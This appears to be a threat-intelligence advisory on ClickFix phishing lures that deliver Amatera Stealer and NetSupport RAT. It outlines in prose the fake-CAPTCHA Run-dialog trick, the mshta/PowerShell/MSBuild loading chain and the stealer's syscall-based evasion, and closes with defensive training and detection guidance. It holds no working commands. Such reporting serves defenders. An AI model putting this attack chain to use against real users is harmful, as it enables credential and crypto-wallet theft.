EVALUSION ClickFix lures drop Amatera Stealer and NetSupport RAT

EVALUSION ClickFix phishing campaigns are delivering Amatera Stealer and NetSupport RAT through deceptive reCAPTCHA like prompts and Windows Run dialog abuse, mapping to ATT&CK techniques T1566 (Phishing), T1059.001 (PowerShell), T1105 (Ingress Tool Transfer) and T1555 (Credentials from Password Stores). Researchers observed victims being funneled to bogus pages that claim a reCAPTCHA verification is required, instructing them to paste and run a command in the Windows Run dialog. That command chains mshta and PowerShell to pull a .NET payload from MediaFire, which then loads Amatera via a PureCrypter packed DLL injected into the MSBuild process. Amatera, an evolution of the ACR stealer sold under a malware as a service model, targets crypto wallets, browsers, messaging applications, FTP clients and email services, exfiltrating credentials and wallet data to attacker controlled infrastructure. It employs WoW64 syscalls and other evasion techniques to bypass user mode hooks in sandboxes, antivirus and EDR solutions. Once Amatera has run, it issues a PowerShell command to retrieve and execute NetSupport RAT, but only if it detects that the host is domain joined or has files of apparent value such as crypto wallets. That conditional logic helps the actors conserve infrastructure and focus on more lucrative endpoints. From a business impact perspective, the combination of stealer and RAT enables both rapid credential theft and longer term remote control of compromised machines, increasing the risk of account takeover, business email compromise and follow on ransomware or fraud. The use of widely trusted services such as MediaFire for hosting, as well as browser like checks mimicking Cloudflare Turnstile and Booking dot com CAPTCHA flows, makes these lures highly convincing and harder for users to distinguish from legitimate security prompts. Organizations that have not trained staff against this new ClickFix pattern may see users willingly execute the very commands that establish the compromise. Defenders should update phishing training and internal advisories to explicitly call out ClickFix style lures that ask users to run commands from their keyboard, and establish a strict policy that no legitimate service will ever require use of the Windows Run dialog. Detection engineering teams should monitor for suspicious mshta and PowerShell child processes, MSBuild hosting untrusted .NET assemblies, and outbound connections to cloud file hosting providers consistent with T1059.001, T1105 and T1557 like data theft patterns. Where Amatera or NetSupport are suspected, security teams should treat all credentials, session cookies and wallet keys on affected systems as compromised, reset them at scale and scrutinize lateral movement and persistence mechanisms.